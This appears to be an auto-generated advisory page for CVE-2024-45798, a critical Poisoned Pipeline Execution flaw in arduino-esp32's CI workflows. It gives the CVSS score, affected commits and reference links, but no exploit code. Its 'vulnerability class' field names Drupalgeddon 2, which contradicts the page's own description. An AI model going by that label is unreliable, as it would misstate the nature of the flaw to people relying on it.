What is CVE-2024-45798?

CVE-2024-45798 is a critical-severity vulnerability in Espressif Arduino-esp32, classified under Improper Input Validation. CVSS score: 10.0/10. Published 2024-09-17.

How severe is CVE-2024-45798?

Critical severity. CVSS v3 base score is 10.0 out of 10.

RCE in Espressif Arduino-esp32

CVE-2024-45798

arduino-esp32 is an Arduino core for the ESP32, ESP32-S2, ESP32-S3, ESP32-C3, ESP32-C6 and ESP32-H2 microcontrollers. The `arduino-esp32` CI is vulnerable to multiple Poisoned Pipeline Execution (PPE) vulnerabilities. Code injection in `te…

Vulnerability class: Drupalgeddon 2 (CVE-2018-7600)

EPSS: 0.003 (55.3th percentile) — read the EPSS interpretation.

CVSS v3 metric

CVSS v3 base score 10.0 (Critical). Vector: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H.

Affected products

Espressif Arduino-esp32 — versions Commits prior to a7cec020df8f1a815bd8dfd2559f51a2216bcf1c

Weakness classification (CWE)

References

https://github.com/espressif/arduino-esp32/security/advisories/GHSA-h52q-xhg2-6jw8 (x_refsource_CONFIRM)
https://codeql.github.com/codeql-query-help/javascript/js-actions-command-injection (x_refsource_MISC)
https://github.com/espressif/arduino-esp32/blob/690bdb511d9f001e2066da2dda2c631a3eee270f/.github/workflows/tests_results.yml (x_refsource_MISC)
https://securitylab.github.com/research/github-actions-preventing-pwn-requests (x_refsource_MISC)
https://securitylab.github.com/research/github-actions-untrusted-input (x_refsource_MISC)

Frequently asked questions

What is CVE-2024-45798?: CVE-2024-45798 is a critical-severity vulnerability in Espressif Arduino-esp32, classified under Improper Input Validation. CVSS score: 10.0/10. Published 2024-09-17.
How severe is CVE-2024-45798?: Critical severity. CVSS v3 base score is 10.0 out of 10.